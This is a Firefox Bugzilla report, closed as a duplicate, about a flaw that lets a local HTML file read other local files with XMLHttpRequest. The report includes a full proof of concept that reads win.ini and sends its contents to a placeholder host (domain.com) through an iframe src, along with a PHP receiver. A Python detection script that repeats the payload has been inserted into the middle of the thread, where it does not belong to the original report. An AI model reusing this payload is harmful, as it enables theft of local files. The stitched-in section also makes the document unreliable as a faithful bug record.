Closed Bug 343047 Opened 19 years ago Closed 19 years ago

Possible security flaw that would allow sending data from the local machine

Categories

(Firefox :: Security, defect)

x86
Windows XP
defect
Not set
normal


RESOLVED DUPLICATE of bug 230606

People

(Reporter: alex, Unassigned)


Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4

I've read http://zabbey.com/labs/firefox/ describing a possible security flaw that would allow sending data (from local files) using XmlHttpRequest.

Reproducible: Always

Steps to Reproduce:
1. Open a local html file
[code]
<html>
<head>
<script type="text/javascript">
var req = new XMLHttpRequest();
function ajaxSend(file) {
  req.open('get', file);
  req.onreadystatechange = ajaxResponse;
  req.send(null);
}
function ajaxResponse() {
  if (req.readyState == 4) {
    var res = req.responseText; // content of file://C:/WINDOWS/win.ini
    document.getElementById('gotcha').src = 'http://domain.com/display.php?q=' + encodeURIComponent(res);
  }
}
</script>
</head>
<body onload="ajaxSend('file://C:/WINDOWS/win.ini');">
<iframe id="gotcha"></iframe>
</body>
</html>
[/code]

-- Server side (display.php)
[code]
<?php echo nl2br($_GET['q']); ?>
[/code]

Actual Results:
File contents sent

Expected Results:
I think firefox should not allow this behavior(!), but it seems like other browsers have this _problem_ too.
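Added here as a defensive triage aid, not part of the bug report or of Firefox: a small Python heuristic that scans a saved HTML file for the three pieces of the pattern the reporter describes (an XMLHttpRequest, a quoted file:// URL, and a remote src assignment built by string concatenation) and flags their combination. The sample document is a constructed copy of the PoC's shape; the regexes and the verdict rule are my own assumptions and cover only this pattern.

```python
import re

# Constructed sample mirroring the shape of the PoC attached to this bug:
# an XHR to a file:// URL whose response is pushed into a remote iframe src.
SAMPLE_HTML = """<html><head><script type="text/javascript">
var req = new XMLHttpRequest();
function ajaxSend(file) { req.open('get', file); req.onreadystatechange = ajaxResponse; req.send(null); }
function ajaxResponse() {
  if (req.readyState == 4) {
    var res = req.responseText;
    document.getElementById('gotcha').src = 'http://domain.com/display.php?q=' + encodeURIComponent(res);
  }
}
</script></head>
<body onload="ajaxSend('file://C:/WINDOWS/win.ini');"><iframe id="gotcha"></iframe></body></html>"""

# Constructed benign page used as a control.
BENIGN_HTML = "<html><body><p>Nothing to see here.</p></body></html>"

# Indicator 1: any use of XMLHttpRequest at all.
XHR = re.compile(r"XMLHttpRequest", re.I)
# Indicator 2: a quoted file:// URL (the local read target).
FILE_URL = re.compile(r"""['"](file:/[^'"]*)['"]""", re.I)
# Indicator 3: a .src assignment to an http(s) literal followed by '+',
# i.e. a remote URL with data concatenated onto it (the exfiltration sink).
REMOTE_SINK = re.compile(r"""\.src\s*=\s*['"](https?://[^'"]*)['"]\s*\+""", re.I)


def scan_html(text: str) -> dict:
    """Return the indicators found in `text` and a combined verdict.

    The page is flagged only when all three indicators co-occur; any one of
    them alone is common in legitimate local pages.
    """
    findings = {
        "uses_xhr": bool(XHR.search(text)),
        "local_file_urls": FILE_URL.findall(text),
        "remote_sinks": REMOTE_SINK.findall(text),
    }
    findings["suspicious"] = (
        findings["uses_xhr"]
        and bool(findings["local_file_urls"])
        and bool(findings["remote_sinks"])
    )
    return findings


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(name, scan_html(doc))
```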
Please search prior to filing a bug. See also bug 56236.

*** This bug has been marked as a duplicate of 258875 ***
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
Whoops, wrong bug number in the clipboard...
Status: RESOLVED → UNCONFIRMED
Resolution: DUPLICATE → ---
*** This bug has been marked as a duplicate of 230606 ***
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE